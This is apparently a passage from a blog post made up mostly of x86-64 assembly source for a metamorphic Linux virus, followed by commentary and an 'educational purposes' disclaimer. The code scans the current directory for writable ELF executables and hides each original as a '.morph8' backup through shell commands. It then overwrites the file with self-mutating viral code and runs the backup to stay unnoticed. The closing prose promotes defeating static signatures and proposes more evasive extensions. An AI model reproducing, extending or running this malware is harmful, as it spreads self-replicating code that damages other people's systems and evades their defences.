mov rsi, rax
mov rdi, [rsp]
call strcmp
pop rdi
test rax, rax
jz .chosen_one
push rdi
push rsi
push rbx
; Check if filename starts with .morph8
mov rsi, hidden_prefix
mov rbx, rdi
.see_hidden:
mov al, [rbx]
mov dl, [rsi]
test dl, dl
jz .is_hidden ; End of prefix - it's a hidden file
cmp al, dl
jne .not_hidden ; Mismatch - not hidden
inc rbx
inc rsi
jmp .see_hidden
.is_hidden:
pop rbx
pop rsi
pop rdi
jmp .skip_entry
.not_hidden:
pop rbx
pop rsi
pop rdi
mov rsi, vxx_str
call strstr
test rax, rax
jnz .found_vxx
push rdi
mov rsi, X_OK
call sys_access
pop rdi
cmp rax, 0
jne .not_exec
push rdi
mov rsi, W_OK
call sys_access
pop rdi
cmp rax, 0
jne .not_exec
jmp .e_conditions
.not_exec:
jmp .skip_entry
.e_conditions:
sub rsp, 256
mov r8, rsp
push rdi
mov rdi, r8
mov rsi, [rsp]
call hidden_name
mov rax, SYS_open
mov rdi, r8
mov rsi, O_RDONLY
xor rdx, rdx
syscall
pop rdi
test rax, rax
js .not_exists
; Hidden file exists - been here, skip it
push rdi
mov rdi, rax
call sys_close
pop rdi
add rsp, 256
jmp .skip_entry
.not_exists:
add rsp, 256
; Check if we're trying to infect ourselves
push rdi ; Save current filename
; Get our own basename
mov rdi, bin_name
call basename
mov rsi, rax
mov rdi, [rsp]
call strcmp
pop rdi
test rax, rax
jz .skip_self_infection ; If filenames match, skip infection
; Check if file is a valid ELF executable before infection
push rdi
call is_elf
pop rdi
test rax, rax
jz .skip_non_elf ; Not a valid ELF, skip infection
push rdi
call implant
pop rdi
jmp .skip_entry
.skip_self_infection:
; Don't infect ourselves, just skip
jmp .skip_entry
.skip_non_elf:
; Not a valid ELF executable, skip infection
jmp .skip_entry
.chosen_one:
push rdi
mov rsi, rdi
mov rdi, orig_exec_name
call strcpy
pop rdi
jmp .skip_entry
.found_vxx:
mov byte [vierge], 0
.skip_entry:
pop rax
add r15, rax
jmp .list_entry
.list_done:
mov rdi, r12
call sys_close
.list_error:
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
implant: ; infect target executable
push r12
push r13
mov r12, rdi
; Validate input
test r12, r12
jz .d_skip
push r12
mov rdi, r12
call strlen
pop r12
mov r13, rax
; Check filename length bounds
cmp r13, 200
jg .d_skip
test r13, r13
jz .d_skip
; Check if we have code to embed
mov rax, [codelen]
test rax, rax
jz .d_skip
cmp rax, 65536
jg .d_skip
; 1: Create hidden backup of original file
sub rsp, 768
mov rdi, rsp
add rdi, 512 ; Use third section for hidden name
mov rsi, r12
call hidden_name
; Check if hidden backup already exists
mov rax, SYS_open
mov rdi, rsp
add rdi, 512 ; hidden name
mov rsi, O_RDONLY
xor rdx, rdx
syscall
test rax, rax
js .fallback ; File doesn't exist, create backup
mov rdi, rax
call sys_close
jmp .infect_orgi ; Proceed to reinfect with new mutations
.fallback:
mov rdi, rsp ; Use first section for command
mov rsi, cp_cmd_fmt
mov rdx, r12 ; original filename
mov rcx, rsp
add rcx, 512 ; hidden name
call sprintf_two_args
mov rdi, rsp
call system_call
; Set permissions on hidden file
mov rdi, rsp
add rdi, 256 ; Use second section for chmod command
mov rsi, chmod_cmd_fmt
mov rdx, rsp
add rdx, 512 ; hidden name
call sprintf
mov rdi, rsp
add rdi, 256
call system_call
.infect_orgi:
add rsp, 768
; 2: Replace original file with viral code
mov rdi, r12 ; original filename
mov rsi, code
mov rdx, [codelen]
call write_f
.d_skip:
pop r13
pop r12
ret
;; payload execution
execute: ; virus payload
JUNK
mov rdi, msg_cat
call strlen
mov rdx, rax
mov rdi, 1
mov rsi, msg_cat
call sys_write
JUNK
ret
hidden_name: ; create .morph8
push rsi
push rdi
push rbx
push rcx
mov rbx, rsi
mov rcx, hidden_prefix
.check_prefix:
mov al, [rbx]
mov dl, [rcx]
test dl, dl
jz .already_one ; it matches
cmp al, dl
jne .add_prefix ; Mismatch
inc rbx
inc rcx
jmp .check_prefix
.already_one:
; File already has .morph8 prefix, just copy it
jmp .cp_file
.add_prefix:
; Add .morph8 prefix
mov byte [rdi], '.'
mov byte [rdi + 1], 'm'
mov byte [rdi + 2], 'o'
mov byte [rdi + 3], 'r'
mov byte [rdi + 4], 'p'
mov byte [rdi + 5], 'h'
mov byte [rdi + 6], '8'
add rdi, 7
.cp_file:
mov al, [rsi]
test al, al
jz .done
mov [rdi], al
inc rsi
inc rdi
jmp .cp_file
.done:
mov byte [rdi], 0
pop rcx
pop rbx
pop rdi
pop rsi
ret
sprintf: ; basic string formatting
push r9
push r10
mov r8, rdi ; dst
mov r9, rsi ; string
mov r10, rdx ; arg
.scan_format:
mov al, [r9]
test al, al
jz .done
cmp al, '%'
je .found_percent
mov [r8], al
inc r8
inc r9
jmp .scan_format
.found_percent:
inc r9
mov al, [r9]
cmp al, 's'
je .cp_arg
cmp al, '%'
je .cp_percent
; Unknown format, copy literally
mov byte [r8], '%'
inc r8
mov [r8], al
inc r8
inc r9
jmp .scan_format
.cp_percent:
mov byte [r8], '%'
inc r8
inc r9
jmp .scan_format
.cp_arg:
push r9
mov r9, r10
.cp_loop:
mov al, [r9]
test al, al
jz .cp_done
mov [r8], al
inc r8
inc r9
jmp .cp_loop
.cp_done:
pop r9
inc r9
jmp .scan_format
.done:
mov byte [r8], 0
pop r10
pop r9
ret
sprintf_two_args: ; string with two args
push rbp
mov rbp, rsp
push r10
push r11
push r12
mov r8, rdi ; dst buffer
mov r9, rsi ; string
mov r10, rdx ; 1 arg
mov r11, rcx ; 2 arg
xor r12, r12 ; arg cnt
.cp_loop:
mov al, [r9]
test al, al
je .done
cmp al, '%'
je .handle_format
mov [r8], al
inc r8
inc r9
jmp .cp_loop
.handle_format:
inc r9
mov al, [r9]
cmp al, 's'
je .cp_string
cmp al, '%'
je .cp_percent
mov byte [r8], '%'
inc r8
mov [r8], al
inc r8
inc r9
jmp .cp_loop
.cp_percent:
mov byte [r8], '%'
inc r8
inc r9
jmp .cp_loop
.cp_string:
cmp r12, 0
je .use_arg1
mov rdx, r11 ; second arg
jmp .do_cp
.use_arg1:
mov rdx, r10 ; first arg
.do_cp:
inc r12
push r9
push rdx
mov r9, rdx
.str_cp:
mov al, [r9]
test al, al
je .str_done
mov [r8], al
inc r8
inc r9
jmp .str_cp
.str_done:
pop rdx
pop r9
inc r9
jmp .cp_loop
.done:
mov byte [r8], 0
pop r12
pop r11
pop r10
pop rbp
ret
system_call: ; execute shell
push r12
mov r12, rdi
mov rax, SYS_fork
syscall
test rax, rax
jz .child_process
js .error
mov rdi, rax
xor rsi, rsi
xor rdx, rdx
xor r10, r10
mov rax, SYS_wait4
syscall
pop r12
ret
.child_process:
sub rsp, 32
mov qword [rsp], sh_arg0
mov qword [rsp+8], sh_arg1
mov qword [rsp+16], r12
mov qword [rsp+24], 0
mov rax, SYS_execve
mov rdi, shell_path
mov rsi, rsp
xor rdx, rdx
syscall
mov rax, SYS_exit
mov rdi, 1
syscall
.error:
pop r12
ret
;; entry point
_start:
; anti goes here
;avant:
call d_str ; Decrypt all
mov rax, SYS_getrandom
mov rdi, signme
mov rsi, 4
xor rdx, rdx
syscall
mov al, [vierge_val]
mov [vierge], al
pop rdi
mov rsi, rsp
push rsi
mov rdi, bin_name
mov rsi, [rsp]
call strcpy
mov rdi, [rsp]
call basename
mov rdi, orig_exec_name
mov rsi, rax
call strcpy
call execute
pop rsi
push rsi
; Read our own code
mov rdi, [rsi]
call read_code
mov rax, [codelen]
test rax, rax
jz .skip_mutation
; Apply mutations
call replace_junk
.skip_mutation:
pop rsi
push rsi
mov rdi, current_dir
mov rsi, [rsi]
call list
cmp byte [vierge], 1
jne .exec_theone
cmp byte [orig_exec_name], 0
jne .orig_name_ok
mov rdi, bin_name
call basename
mov rdi, orig_exec_name
mov rsi, rax
call strcpy
.orig_name_ok:
; Build hidden name for the chosen one
sub rsp, 512
mov rdi, rsp
add rdi, 256
mov rsi, orig_exec_name
call hidden_name
; Create touch command
mov rdi, rsp ; Use first half for command
mov rsi, touch_cmd_fmt
mov rdx, rsp
add rdx, 256 ; Point to hidden name
call sprintf
mov rdi, rsp
call system_call
; Create chmod command
mov rdi, rsp ; Reuse first half for command
mov rsi, touch_chmod_fmt
mov rdx, rsp
add rdx, 256 ; Point to hidden name
call sprintf
mov rdi, rsp
call system_call
add rsp, 512
.exec_theone:
mov rdi, bin_name
mov rsi, hidden_prefix
call strstr
test rax, rax
jnz .killme
; Build hidden name and execute it
sub rsp, 512
mov rdi, rsp
add rdi, 256 ; Use second half for hidden name
mov rsi, orig_exec_name
call hidden_name
; Create exec command
mov rdi, rsp ; Use first half for command
mov rsi, exec_cmd_fmt
mov rdx, rsp
add rdx, 256 ; Point to hidden name
call sprintf
mov rdi, rsp
call system_call
add rsp, 512
.killme:
; Clean up any leftovers
call zero0ut
pop rsi
xor rdi, rdi
mov rax, SYS_exit
syscall
zero0ut:
mov rdi, code
mov rcx, 65536
xor al, al
rep stosb
mov rdi, dir_buf
mov rcx, 4096
xor al, al
rep stosb
mov rdi, temp_buf
mov rcx, 1024
xor al, al
rep stosb
ret
read_code:
mov rsi, code
call read_f
test rax, rax
js .error
mov [codelen], rax
ret
.error:
mov qword [codelen], 0
ret
extract_v:
push r12
push r13
push r14
mov rdi, bin_name
mov rsi, code
call read_f
test rax, rax
js .err_v
cmp rax, 65536
jle .size_ok
mov rax, 65536
.size_ok:
mov [codelen], rax
jmp .ext_done
.err_v:
mov qword [codelen], 0
xor rax, rax
.ext_done:
pop r14
pop r13
pop r12
ret
This Is Only the Foundation
Its purpose is to demonstrate core mechanisms, not to claim coverage of a complete system. Metamorphic and polymorphic engines go far deeper than what is shown here. What we have now is a starting point — sufficient to prove the concept, but still far from full-spectrum capability.
Currently, the mutation engine only processes its own defined junk patterns. It does not touch arbitrary instruction sequences. It also only supports basic register replacement so far. Features such as instruction reordering, control-flow rewriting, and logical substitution are absent.
Mutation patterns are hard-coded. There is no adaptive behavior. Propagation logic is also kept simple.
vx-mutation-demo
Each generation becomes different at the byte level, yet does the same things. What changes is the implementation, not the behavior. This is exactly why it shatters static signatures.
As the VX repeatedly reinfects, the code drifts further from its original form. The hidden backup mechanism helps it stay low-profile. The original file continues to run normally, allowing the VX to persist quietly.
Of course, these capabilities come at a cost: CPU and memory consumption, and doubled storage usage due to backups.
— Possibilities —
If you want to push further, you will need a larger pattern library, smarter runtime self-analysis, clean syscall abstraction for cross-platform support, and deeper code analysis with control-flow and data-flow mapping.
Combine it with polymorphism: encrypted payload + deformable code structure creates a layered system. Surface randomization, internal concealment, final behavior invariant. The adversary will find almost no stable anchor points.
Metamorphic code proves that software can continuously evolve its own implementation while keeping its goals unchanged.
I recommend running the code inside a debugger rather than executing it blindly. Set breakpoints and step down into the assembly layer to inspect exactly what is being generated. This is the best way to catch subtle anomalies.
That’s all for now — see you next time.
Disclaimer:
This blog post is provided solely for educational and research purposes. All technical details and code examples are intended to help defenders understand attack techniques and improve security posture. Please do not use this information to access or interfere with systems you do not own or lack explicit permission to test. Unauthorized use may violate laws and ethical standards. The author assumes no responsibility for any misuse or damage resulting from the application of the concepts discussed.




Top comments (0)